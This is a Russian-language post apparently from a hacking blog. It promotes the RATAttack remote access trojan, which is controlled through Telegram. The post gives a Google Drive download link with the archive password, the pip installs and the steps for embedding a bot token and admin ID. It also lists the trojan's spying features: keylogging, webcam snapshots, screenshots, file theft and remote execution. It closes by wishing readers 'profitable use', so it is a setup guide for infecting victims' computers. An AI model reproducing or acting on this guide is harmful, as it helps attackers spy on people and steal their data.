Бесплатный RAT с управлением через Telegram

Всем салют, дорогие друзья!
На портале GitHub был опубликован исходный код трояна для удаленного доступа (RAT), использующего протокол Telegram для хищения информации с инфицированных устройств. RATAttack устанавливает зашифрованный канал между оператором и зараженным устройством с помощью протокола Telegram. Как утверждает разработчик инструмента, основная проблема большинства существующих на сегодняшний день RAT заключается в том, что они не используют шифрование и их операторы вынуждены настраивать переадресацию портов на устройстве жертвы для управления инфицированным компьютером.

Вирусописатель решил исправить это упущение и представил собственный инструмент под названием RATAttack, который устанавливает зашифрованный канал между оператором и жертвой, используя протокол Telegram. Прежде, чем начинать атаку, владелец RATAttack должен создать бот Telegram и встроить его токен (ключ) в конфигурационный файл трояна. Таким образом все инфицированные устройства будут подключаться к каналу бота и атакующий получит возможность отправлять простые команды для управления RATAttack на зараженном компьютере.

Вот список того, что может данный ратник:

Как установить?

Скачиваем архив по ссылке: https://drive.google.com/open?id=1oHmitldm2WtrRGCoLf20KvF4RgI_Lr7-
Пароль: 777

Что необходимо для ратника: Python 3.8(32 bit)+ необходимые модули, бот в телеграме, его ключ и ваш ID.

Установив питон и скачав архив, открываем файл RAT через IDLE например

Видим данные строки:

в token мы пропишем токен бота, а в adm – ваш ID телеграма. Но, для начала нужно поставить модули. Открываем консоль и прописываем:

pip3 install python-opencv

pip3 install pytelegrambotapi

pip3 install pypiwin32

pip3 install pyaudio

Создаем бота в телеграме у @BotFather, после чего находим API:

Копируем длинную строчку без кавычек, вставляем в RAT.py в строку token. У бота @userinfobot узнаём свой ID и тоже вставляем в RAT.py в строку adm, после чего,нажимаем Run Module(F5)

Бот прислал нам оповещение:

Кнопки навигации:

Троян может действовать в качестве кейлоггера, собирать данные об установленной версии ОС Windows, процессоре и т.д., IP-адресе и приблизительном местоположении хоста, отображать сообщения, загружать и выгружать различные файлы, делать скриншоты, исполнять любые файлы на целевом компьютере, делать снимки с web-камеры, копировать, перемещать и удалять файлы, а также запускать процесс самоуничтожения.

Разработчик RATAttack не рекламировал троян на каких-либо хакерских форумах и опубликовал код только на GitHub. В настоящее время он уже удален с портала, однако скачать его можно по ссылке выше. Кстати, на гитхабе уже успели сделать форки. Например, пользователь mvrozanti даже начал расширение функционала.

На сегодня это все. Желаю профитного использования!

👉Да, хочу!ᅠ